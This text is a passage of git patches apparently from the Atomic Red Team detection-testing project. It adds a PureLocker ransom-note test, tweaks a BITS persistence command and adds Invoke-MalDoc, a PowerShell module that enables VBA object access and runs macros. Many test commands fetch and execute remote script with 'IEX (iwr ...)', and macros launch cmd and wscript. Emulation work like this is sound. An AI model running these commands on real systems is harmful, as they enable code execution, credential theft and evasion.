T1565: technique: external_references: diff --git a/atomics/T1486/T1486.md b/atomics/T1486/T1486.md index 293063cb..afe77350 100644 --- a/atomics/T1486/T1486.md +++ b/atomics/T1486/T1486.md @@ -16,6 +16,8 @@ In cloud environments, storage objects within compromised accounts may also be e - [Atomic Test #4 - Encrypt files using openssl (Linux)](#atomic-test-4---encrypt-files-using-openssl-linux) +- [Atomic Test #5 - PureLocker Ransom Note](#atomic-test-5---purelocker-ransom-note) +
@@ -230,4 +232,37 @@ which_openssl=`which openssl` +
+
+ +## Atomic Test #5 - PureLocker Ransom Note +building the IOC (YOUR_FILES.txt) for the PureLocker ransomware +https://www.bleepingcomputer.com/news/security/purelocker-ransomware-can-lock-files-on-windows-linux-and-macos/ + +**Supported Platforms:** Windows + + +**auto_generated_guid:** 649349c7-9abf-493b-a7a2-b1aa4d141528 + + + + + + +#### Attack Commands: Run with `command_prompt`! Elevation Required (e.g. root or admin) + + +```cmd +echo T1486 - Purelocker Ransom Note > %USERPROFILE%\Desktop\YOUR_FILES.txt +``` + +#### Cleanup Commands: +```cmd +del %USERPROFILE%\Desktop\YOUR_FILES.txt >nul 2>&1 +``` + + + + +
From e4f7f6720246d72cb3b14f6c470486ccfd579f7e Mon Sep 17 00:00:00 2001 From: Michael Haag <5632822+MHaggis@users.noreply.github.com> Date: Mon, 28 Jun 2021 12:28:26 -0600 Subject: [PATCH 80/84] Update T1197.yaml (#1535) * Update T1197.yaml Resolving #1459 * Update T1197.yaml * Update T1197.yaml --- atomics/T1197/T1197.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/atomics/T1197/T1197.yaml b/atomics/T1197/T1197.yaml index c7317d0b..6b16915c 100644 --- a/atomics/T1197/T1197.yaml +++ b/atomics/T1197/T1197.yaml @@ -77,7 +77,7 @@ atomic_tests: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} From 988716bc19047bd44abebc47580aca1b5837c6f0 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Mon, 28 Jun 2021 18:28:53 +0000 Subject: [PATCH 81/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 4 ++-- atomics/T1197/T1197.md | 2 +- 2 files changed, 3 insertions(+), 3 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index c4351d9f..3afb17fe 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -19113,7 +19113,7 @@ defense-evasion: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} @@ -37879,7 +37879,7 @@ persistence: command: | bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} - bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" + bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} diff --git a/atomics/T1197/T1197.md b/atomics/T1197/T1197.md index f5068754..634b81f0 100644 --- a/atomics/T1197/T1197.md +++ b/atomics/T1197/T1197.md @@ -131,7 +131,7 @@ This job will remain in the BITS queue until complete or for up to 90 days by de ```cmd bitsadmin.exe /create #{bits_job_name} bitsadmin.exe /addfile #{bits_job_name} #{remote_file} #{local_file} -bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} "" +bitsadmin.exe /setnotifycmdline #{bits_job_name} #{command_path} NULL bitsadmin.exe /resume #{bits_job_name} timeout 5 bitsadmin.exe /complete #{bits_job_name} From 78f6d1988f5affbcbdeba9631b56eb1084131bb5 Mon Sep 17 00:00:00 2001 From: Adam Mashinchi <78813159+amashinchi-rc@users.noreply.github.com> Date: Tue, 29 Jun 2021 10:15:51 -0700 Subject: [PATCH 82/84] Add "Request Invite" next to Slack Link (#1538) --- README.md | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/README.md b/README.md index a1258851..0a0bc26d 100644 --- a/README.md +++ b/README.md @@ -34,7 +34,7 @@ See: https://atomicredteam.io ## Having trouble? -Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) +Join the community on Slack at [https://atomicredteam.slack.com](https://atomicredteam.slack.com) ([Request Invite](https://docs.google.com/forms/d/e/1FAIpQLSc3oMtugGy--6kcYiY52ZJQQ-iOaEy-UpxfSA37IlA5wCMV0A/viewform?usp=sf_link)) ## Getting Started From c0e5117730610fd7cdf254c9f386a5ab6931790c Mon Sep 17 00:00:00 2001 From: Carrie Roberts Date: Thu, 1 Jul 2021 20:11:10 -0600 Subject: [PATCH 83/84] moving invoke-maldoc into art repo --- atomics/T1053.005/T1053.005.yaml | 2 +- atomics/T1055.012/T1055.012.yaml | 2 +- atomics/T1055/T1055.yaml | 2 +- atomics/T1059.005/T1059.005.yaml | 4 +- atomics/T1070.001/T1070.001.yaml | 2 +- atomics/T1115/T1115.yaml | 2 +- atomics/T1204.002/T1204.002.yaml | 10 +-- atomics/T1204.002/src/Invoke-MalDoc.ps1 | 100 ++++++++++++++++++++++++ atomics/T1555/T1555.yaml | 2 +- atomics/T1564/T1564.yaml | 2 +- atomics/T1566.001/T1566.001.yaml | 2 +- 11 files changed, 115 insertions(+), 15 deletions(-) create mode 100644 atomics/T1204.002/src/Invoke-MalDoc.ps1 diff --git a/atomics/T1053.005/T1053.005.yaml b/atomics/T1053.005/T1053.005.yaml index 204e3985..59a7b460 100644 --- a/atomics/T1053.005/T1053.005.yaml +++ b/atomics/T1053.005/T1053.005.yaml @@ -128,7 +128,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1053.005\src\T1053.005-macrocode.txt" -officeProduct "#{ms_product}" -sub "Scheduler" name: powershell - name: WMI Invoke-CimMethod Scheduled Task diff --git a/atomics/T1055.012/T1055.012.yaml b/atomics/T1055.012/T1055.012.yaml index f73de2eb..742cd901 100644 --- a/atomics/T1055.012/T1055.012.yaml +++ b/atomics/T1055.012/T1055.012.yaml @@ -60,6 +60,6 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-MalDoc -macroFile "PathToAtomicsFolder\T1055.012\src\T1055.012-macrocode.txt" -officeProduct "#{ms_product}" -sub "Exploit" name: powershell diff --git a/atomics/T1055/T1055.yaml b/atomics/T1055/T1055.yaml index 83d13c9b..cfb0bf62 100644 --- a/atomics/T1055/T1055.yaml +++ b/atomics/T1055/T1055.yaml @@ -27,7 +27,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell - name: Remote Process Injection in LSASS via mimikatz diff --git a/atomics/T1059.005/T1059.005.yaml b/atomics/T1059.005/T1059.005.yaml index 61f9bc20..3425d472 100644 --- a/atomics/T1059.005/T1059.005.yaml +++ b/atomics/T1059.005/T1059.005.yaml @@ -55,7 +55,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059.005-macrocode.txt" -officeProduct "Word" -sub "Exec" cleanup_command: | Get-WmiObject win32_process | Where-Object {$_.CommandLine -like "*mshta*"} | % { "$(Stop-Process $_.ProcessID)" } | Out-Null @@ -90,7 +90,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1059.005\src\T1059_005-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\atomic_t1059_005_test_output.bin" -ErrorAction Ignore diff --git a/atomics/T1070.001/T1070.001.yaml b/atomics/T1070.001/T1070.001.yaml index 019d9ef3..fdd29975 100644 --- a/atomics/T1070.001/T1070.001.yaml +++ b/atomics/T1070.001/T1070.001.yaml @@ -55,7 +55,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell elevation_required: true diff --git a/atomics/T1115/T1115.yaml b/atomics/T1115/T1115.yaml index 6ef34667..12bcbf94 100644 --- a/atomics/T1115/T1115.yaml +++ b/atomics/T1115/T1115.yaml @@ -64,7 +64,7 @@ atomic_tests: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" cleanup_command: | Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore diff --git a/atomics/T1204.002/T1204.002.yaml b/atomics/T1204.002/T1204.002.yaml index 8c749447..a39afdda 100644 --- a/atomics/T1204.002/T1204.002.yaml +++ b/atomics/T1204.002/T1204.002.yaml @@ -37,7 +37,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"cscript.exe #{jse_path}`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: | @@ -93,7 +93,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " a = Shell(`"cmd.exe /c choice /C Y /N /D Y /T 3`", vbNormalFocus)" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell @@ -129,7 +129,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n a = Shell(`"cmd.exe /c wscript.exe //E:jscript #{jse_path}`", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" name: powershell @@ -164,7 +164,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{bat_path}`" For Output As #1`n Write #1, `"calc.exe`"`n Close #1`n a = Shell(`"cmd.exe /c $bat_path `", vbNormalFocus)`n" Invoke-MalDoc -macroCode $macrocode -officeProduct #{ms_product} name: powershell @@ -290,7 +290,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1204.002\src\chromeexec-macrocode.txt" -officeProduct "Word" -sub "ExecChrome" name: powershell diff --git a/atomics/T1204.002/src/Invoke-MalDoc.ps1 b/atomics/T1204.002/src/Invoke-MalDoc.ps1 new file mode 100644 index 00000000..b567ad56 --- /dev/null +++ b/atomics/T1204.002/src/Invoke-MalDoc.ps1 @@ -0,0 +1,100 @@ +function Invoke-MalDoc { + <# + .SYNOPSIS + A module to programatically execute Microsoft Word and Exel Documents containing macros. + + .DESCRIPTION + A module to programatically execute Microsoft Word and Exel Documents containing macros. The module will temporarily add a registry key to allow PowerShell to interact with VBA. + .PARAMETER macroCode + [Required] The VBA code to be executed. By default, this macro code will be wrapped in a sub routine, called "Test" by default. If you don't want your macro code to be wrapped in a subroutine use the `-noWrap` flag. To specify the subroutine name use the `-sub` parameter. + .PARAMETER macroFile + [Required] A file containing the VBA code to be executed. To specify the subroutine name to be called use the `-sub` parameter. + .PARAMETER officeVersion + [Optional] The Microsoft Office version to use for executing the document. e.g. "16.0". The version will be determined Programmatically if not specified. + .PARAMETER officeProduct + [Required] The Microsoft Office application in which to create and execute the macro, either "Word" or "Excel". + .PARAMETER sub + [Optional] The name of the subroutine in the macro code to call for execution. Also the name of the subroutine to wrap the supplied `macroCode` in if `noWrap` is not specified. + .PARAMETER noWrap + [Optional] A switch that specifies that the supplied `macroCode` should be used as-is and not wrapped in a subroutine. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Word" + ----------- + Create a macro enabled Microsoft Word Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "Test" and then executed. + + .EXAMPLE + C:\PS> $macroCode = Get-Content path/to/macro.txt -Raw + C:\PS> Invoke-Maldoc -macroCode $macroCode -officeProduct "Word" + ----------- + Create a macro enabled Microsoft Word Document. The macro code read from `path/to/macro.txt` will be wrapped inside of a subroutine call "Test" and then executed. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroCode "MsgBox `"Hello`"" -officeProduct "Excel" -sub "DoIt" + ----------- + Create a macro enabled Microsoft Excel Document. The macro code `MsgBox "Hello"` will be wrapped inside of a subroutine call "DoIt" and then executed. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroCode "Sub Exec()`nMsgBox `"Hello`"`nEnd Sub" -officeProduct "Word" -noWrap -sub "Exec" + ----------- + Create a macro enabled Microsoft Word Document. The macroCode will be unmodified (i.e. not wrapped insided a subroutine) and the "Exec" subroutine will be executed. + + .EXAMPLE + C:\PS> Invoke-Maldoc -macroFile "C:\AtomicRedTeam\atomics\T1003\src\macro.txt" -officeProduct "Word" -sub "DoIt" + ----------- + Create a macro enabled Microsoft Word Document. The macroCode will be read from the specified file and the "DoIt" subroutine will be executed. + +#> + + Param( + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "code")] + [String]$macroCode, + + [Parameter(Position = 0, Mandatory = $True, ParameterSetName = "file")] + [String]$macroFile, + + [Parameter(Position = 1, Mandatory = $False)] + [String]$officeVersion, + + [Parameter(Position = 2, Mandatory = $True)] + [ValidateSet("Word", "Excel")] + [String]$officeProduct, + + [Parameter(Position = 3, Mandatory = $false)] + [String]$sub = "Test", + + [Parameter(Position = 4, Mandatory = $false, ParameterSetName = "code")] + [switch]$noWrap + ) + + $app = New-Object -ComObject "$officeProduct.Application" + if (-not $officeVersion) { $officeVersion = $app.Version } + $Key = "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" + if (-not (Test-Path $key)) { New-Item $Key } + Set-ItemProperty -Path $Key -Name 'AccessVBOM' -Value 1 + + if ($macroFile) { + $macroCode = Get-Content $macroFile -Raw + } + elseif (-not $noWrap) { + $macroCode = "Sub $sub()`n" + $macroCode + "`nEnd Sub" + } + + if ($officeProduct -eq "Word") { + $doc = $app.Documents.Add() + } + else { + $doc = $app.Workbooks.Add() + } + $comp = $doc.VBProject.VBComponents.Add(1) + $comp.CodeModule.AddFromString($macroCode) + $app.Run($sub) + $doc.Close(0) + $app.Quit() + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($comp) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($doc) | Out-Null + [System.Runtime.InteropServices.Marshal]::ReleaseComObject($app) | Out-Null + [System.GC]::Collect() + [System.GC]::WaitForPendingFinalizers() + Remove-ItemProperty -Path "HKCU:\Software\Microsoft\Office\$officeVersion\$officeProduct\Security\" -Name 'AccessVBOM' -ErrorAction Ignore +} \ No newline at end of file diff --git a/atomics/T1555/T1555.yaml b/atomics/T1555/T1555.yaml index cb51c49b..e5decf7f 100644 --- a/atomics/T1555/T1555.yaml +++ b/atomics/T1555/T1555.yaml @@ -24,7 +24,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: | Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore diff --git a/atomics/T1564/T1564.yaml b/atomics/T1564/T1564.yaml index 2a20881f..c0874281 100644 --- a/atomics/T1564/T1564.yaml +++ b/atomics/T1564/T1564.yaml @@ -34,7 +34,7 @@ atomic_tests: $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: | Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore diff --git a/atomics/T1566.001/T1566.001.yaml b/atomics/T1566.001/T1566.001.yaml index de1a135a..66e9d7d0 100644 --- a/atomics/T1566.001/T1566.001.yaml +++ b/atomics/T1566.001/T1566.001.yaml @@ -57,7 +57,7 @@ atomic_tests: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) $macrocode = " Open `"#{jse_path}`" For Output As #1`n Write #1, `"WScript.Quit`"`n Close #1`n Shell`$ `"ping 8.8.8.8`"`n" Invoke-MalDoc -macroCode $macrocode -officeProduct "#{ms_product}" cleanup_command: | From 1e024d99ea73ab99540b7f6863c1e16cfa28bed3 Mon Sep 17 00:00:00 2001 From: CircleCI Atomic Red Team doc generator Date: Fri, 2 Jul 2021 12:38:23 +0000 Subject: [PATCH 84/84] Generate docs from job=generate_and_commit_guids_and_docs branch=master [skip ci] --- atomics/Indexes/index.yaml | 38 +++++++++++++++++----------------- atomics/T1053.005/T1053.005.md | 2 +- atomics/T1055.012/T1055.012.md | 2 +- atomics/T1055/T1055.md | 2 +- atomics/T1059.005/T1059.005.md | 4 ++-- atomics/T1070.001/T1070.001.md | 2 +- atomics/T1115/T1115.md | 2 +- atomics/T1204.002/T1204.002.md | 10 ++++----- atomics/T1555/T1555.md | 2 +- atomics/T1564/T1564.md | 2 +- atomics/T1566.001/T1566.001.md | 2 +- 11 files changed, 34 insertions(+), 34 deletions(-) diff --git a/atomics/Indexes/index.yaml b/atomics/Indexes/index.yaml index 3afb17fe..7160e201 100644 --- a/atomics/Indexes/index.yaml +++ b/atomics/Indexes/index.yaml @@ -1114,7 +1114,7 @@ credential-access: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1555\src\T1555-macrocode.txt" -officeProduct "Word" -sub "Extract" cleanup_command: 'Remove-Item "$env:TEMP\windows-credentials.txt" -ErrorAction Ignore @@ -6933,7 +6933,7 @@ collection: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 Set-Clipboard -value "Atomic T1115 Test, grab data from clipboard via VBA" - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1115\src\T1115-macrocode.txt" -officeProduct "Word" -sub "GetClipboard" cleanup_command: 'Remove-Item "$env:TEMP\atomic_T1115_clipboard_data.txt" -ErrorAction Ignore @@ -15237,7 +15237,7 @@ privilege-escalation: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -15372,7 +15372,7 @@ privilege-escalation: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell - name: Remote Process Injection in LSASS via mimikatz @@ -16268,7 +16268,7 @@ privilege-escalation: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1053.005\\src\\T1053.005-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Scheduler\"\n" name: powershell @@ -20455,7 +20455,7 @@ defense-evasion: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1070.001\src\T1070.001-macrocode.txt" -officeProduct "Word" -sub "ClearLogs" name: powershell elevation_required: true @@ -25299,7 +25299,7 @@ defense-evasion: $macro = [System.IO.File]::ReadAllText("PathToAtomicsFolder\T1564\src\T1564-macrocode.txt") $macro = $macro -replace "aREPLACEMEa", "PathToAtomicsFolder\T1564\bin\extractme.bin" [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroCode "$macro" -officeProduct "Word" -sub "Extract" -NoWrap cleanup_command: 'Remove-Item "$env:TEMP\extracted.exe" -ErrorAction Ignore @@ -30944,7 +30944,7 @@ defense-evasion: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile \"PathToAtomicsFolder\\T1055.012\\src\\T1055.012-macrocode.txt\" -officeProduct \"#{ms_product}\" -sub \"Exploit\"\n" name: powershell @@ -31079,7 +31079,7 @@ defense-evasion: executor: command: | [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 - IEX (iwr "https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1" -UseBasicParsing) + IEX (iwr "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1" -UseBasicParsing) Invoke-Maldoc -macroFile "PathToAtomicsFolder\T1055\src\x64\T1055-macrocode.txt" -officeProduct "Word" -sub "Execute" name: powershell - name: Remote Process Injection in LSASS via mimikatz @@ -44428,7 +44428,7 @@ persistence: ' executor: command: "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12\nIEX - (iwr \"https://raw.githubusercontent.com/redcanaryco/invoke-atomicredteam/master/Public/Invoke-MalDoc.ps1\" + (iwr \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1204.002/src/Invoke-MalDoc.ps1\" -UseBasicParsing) \nInvoke-MalDoc -macroFile 